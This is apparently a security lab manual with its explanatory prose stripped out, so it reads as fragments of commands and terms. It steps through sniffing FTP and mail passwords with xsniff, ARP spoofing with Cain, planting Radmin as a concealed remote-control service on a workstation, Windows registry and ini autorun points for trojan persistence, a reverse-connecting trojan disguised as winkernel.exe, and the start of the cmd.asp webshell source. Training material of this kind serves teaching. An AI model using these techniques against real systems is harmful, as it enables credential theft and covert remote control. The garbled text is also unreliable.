[]
MAC 48 MFC IP ARP RARP MAC CPU CPU promiscuous SNIFF
xsniff xsniff FTP/SMTP/POP3/HTTP
xsniff
-tcp TCP
-udp UDP
-icmp ICMP
-pass /
-addr IP IP
-port port
-log File
-asc ASCII
-hex HEX 16
xsniff.exe -pass -hide -log c:\pass.log
xsniff c:\pass.log
xsniff.exe -tcp -udp -asc -addr 192.168.1.1
192.168.1.1 tcp udp ASCII
[]
1. xsniff.exe Windows Workstation D C:\ Vmware Vmware Tools
2. Windows Workstation D C:\xsniff.exe
3. Windows Workstation D 192.168.80.201 TCP UDP ICMP ASCII
xsniff.exe -tcp -udp -icmp -asc -addr 192.168.80.201
Ctrl+C Ping Windows Server A IP 192.168.80.201
ping 192.168.80.201
Windows Workstation D xsniff
4. Windows Workstation D TCP
xsniff.exe -tcp -pass
Ctrl+C Windows Windows Server A IP 192.168.80.201 FTP @test.com 192.168.80.201 192.168.80.201 user12345678
Outlook Express / Windows Server A 192.168.80.201 Windows Workstation D xsniff
6. Internet Explorer Web Web Windows Server A IP 192.168.80.201
[]
ARP Cain ARP ARP
[]
Cain
[]
Windows 2000/XP/Server 2003 Windows Server A Windows Workstation D
[]
MAC 48 MFC IP ARP RARP MAC CPU CPU promiscuous SNIFF sniffer sniffer
ARP ARP ARP (Address Resolution Protocol) TCP/IP IP MAC MAC MAC MAC' IP MAC ARP IP MAC TCP/IP ARP IP MAC
arp -a ARP
arp -d ARP
arp -s ARP IP MAC
A (192.168.1.1) B (192.168.1.2) A ARP IP MAC MAC ARP IP A MAC FF.FF.FF.FF.FF.FF 192.168.1.2 MAC ARP B A 192.168.1.2 MAC 00-aa-00-62-c6-09 A B MAC B ARP B ARP ARP ARP ARP ARP ARP ARP IP MAC ARP ARP ARP
ABCCABCA-BCBAARP--AARPIPBIPMACCMACAARPACBABIPMACCMACABCARPAARPAARPIP-MACBBAABBABARPCA-BACCBA-----C-----BA------------BB-ACB-AAB
[]
1. Cain ca48_setup.exe Cain C:\Program Files\Cain Winpcap Install
2. Cain Cain Cain C:\Program Files\Cain cain.exe
3. Configure Sniffer VMware Virtual Ethernet Adapter for VMnet8 IP 192.168.80.1
4. Cain Start/Stop sniffer sniffer Sniffer
Sniffer [Scan MAC Address] 192.168.80.201 Windows Server A 192.168.80.204 Windows WorkStation D
5. Sniffer ARP 192.168.80.201 192.168.80.204
OK ARP
6. ARP
7. Windows Workstation D Windows Windows Server A IP 192.168.80.201 FTP @test.com 192.168.80.201 192.168.80.201 user12345678
Outlook Express / Windows Server A 192.168.80.201 Cain
9. Windows Workstation D Internet Explorer Web Windows Server A IP 192.168.80.201
[]
Radmin Radmin
[]
Radmin Radmin
[]
Windows 2000/XP/Server 2003
Windows Workstation D
[]
/ BO2000 ICMP Rootkit
1. IE ActiveX ActiveX Script Asp Cgi Microsoft Office Word Excel PPT Adobe PDF Reader Flash Realplayer
2. file.exe
Win.ini Win.ini [windows] load= run= run=c:\windows\file.exe
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion Run Run RunOnce RunOnceEx RunServices
HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion Run Run RunOnce RunOnceEx RunServices
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion Run Run RunOnce RunOnceEx RunServices
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run File c:\windows\file.exe
System.ini System.ini [boot] shell=Explorer.exe
shell=Explorer.exe file.exe
.exe .htm .txt .zip .com Svchost
3. Windows UnVisiable Windows Windows pslist /
4.
Radmin Radmin Remote Administrator Radmin DOS Radmin Modem Modem 5~10100IT Radmin Radmin Radmin Radmin Radmin Radmin TCP 4899 Radmin Radmin Radmin Radmin
[]
1. 3 Radmin r_server.exe Admdll.dll raddrv.dll 2 Radmin r_server r_server 5 Windows Workstation D C:\Windows\Temp
Vmware Vmware Tools
2. Windows Workstation D C:\Windows\Temp r_server Radmin Radmin TCP 4899
3. services.msc Remote Administrator Service r_server
4. Radmin radmin.exe Radmin Viewer
5. IP DNS Radmin IP 192.168.80.204
6. Radmin Viewer 192.168.80.204 Radmin 192.168.80.204 Radmin Video Hook Kernel
7. Radmin Viewer 192.168.80.204 Telnet DOS
8. Radmin Viewer 192.168.80.204 Radmin Windows C:\Windows\WindowsUpdate.log
9. Windows Workstation D C:\Windows\Temp r_server Radmin 814
Radmin 1~65535 8888 Radmin Radmin services.msc Remote Administrator Service r_server
10. Radmin Viewer 192.168.80.204 8888
192.168.80.204 Radmin Radmin Radmin Radmin
11. Radmin Radmin
7.2.
[]
[]
[]
Windows 2000/XP/Server 2003 Windows Server A Windows Workstation D
[]
IP IP IP IP IP IP
IP IP Windows MS-Dos Telnet Ftp IP DNS IP
[]
1. H_Client.exe
2. 8000 TCP 8000 Web 80 443 8080
3.
IP HTTP DNS IP IP IP IP 192.168.80.1 winkernel.exe
Windows 2000/XP/Server 2003 Service IEXPLORE.exe Server.exe
4. Server.exe Windows Workstation D setup.exe setup.exe
5.
6. Windows C:\boot.ini
7.
8.
9. Telnet
10.
11.
12.
7.3. Windows Webshell
[]
ASP ASPX Webshell Windows IIS Web JSP Webshell Apache Tomcat Web Webshell Web WebShell
[]
ASP Webshell Web ASPX Webshell Web JSP Webshell Web
[]
Windows 2000/XP/Server 2003 Windows Server A
[]
Webshell Webshell Web Web WebShell Webshell ASP ASPX PHP JSP Web Web URL Web
Webshell 80 Webshell Web Web Web Webshell ASP ASPX PHP JSP Webshell Webshell Asp Webshell ASP Webshell Windows IIS Web SYSTEM Guests ASP Webshell Windows Guest Everyone ASP Webshell
1. Webshell ASP Webshell cmd.asp
<%@ Language=VBScript %>
<%
' --------------------o0o--------------------
' File: Cmd.asp
' Author: Maceo maceo@dogmile.com
' Release: 2000-12-01
' OS: Windows 2000, 4.0 NT
' -------------------------------------------
Dim oScript
Dim oScriptNet
Dim oFileSys, oFile
Dim szCMD, szTempFile
On Error Resume Next
' -- create the COM objects that we will be using -- '
Set oScript = Serv